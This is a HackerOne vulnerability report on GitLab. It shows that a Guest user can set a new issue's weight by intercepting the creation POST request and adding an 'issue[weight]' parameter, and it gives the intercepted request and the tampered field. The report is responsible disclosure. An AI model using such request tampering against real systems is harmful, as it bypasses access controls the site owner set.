Guest can set weight of a new issue
Title: Able to Open New Issue with Weight as Guest
Scope: *.gitlab.com
Weakness: None
Severity: Low
Link: https://hackerone.com/reports/411614
Date: 2018-09-20 03:03:01 +0000
By: @ngalog
Summary: From https://docs.gitlab.com/ee/user/permissions.html, Gitlab doesn't allow guest user to assign new issue, submit new issue with labels etc. i.e. except the confidentiality of the issue, all of the other metadata of newly submitted issue are not allowed be set by Guest.
Description: Although there is no documentation clearly stated that guest are not allowed to submit issue with weight, however from the UI for Gitlab, I believe this is the intended design.
However, if you intercept the request when submitted a new issue as Guest, and add this to the POST request, you can set the weight of the issue.
PoC: https://gitlab.com/gitlab-org/gitlab-ce/issues/51669
Steps To Reproduce:
Go to any public project Submit a new issue, intercept the request
POST /gitlab-org/gitlab-ce/issues HTTP/1.1
Host: gitlab.com
Connection: close...
utf8=%E2%9C%93&authenticity_token=7R8s0gvvJcsytWxZ0lpwjBpnY7fi53Kh1DGF7ChpaXw1hkTwPq5oQnxjz7btPoPqhYeLdOPm9qi6j0esRufoXg%3D%3D&issue%5Btitle%5D=heavy&issue%5Bdescription%5D=This+issue+is+very+heavy&issue%5Bconfidential%5D=0&issue%5Block_version%5D=
Add this to the POST requests form
&issue%5Bweight%5D=9
The issue has a weight of 9 now
Impact
Guest can set the weight of a newly submitted issue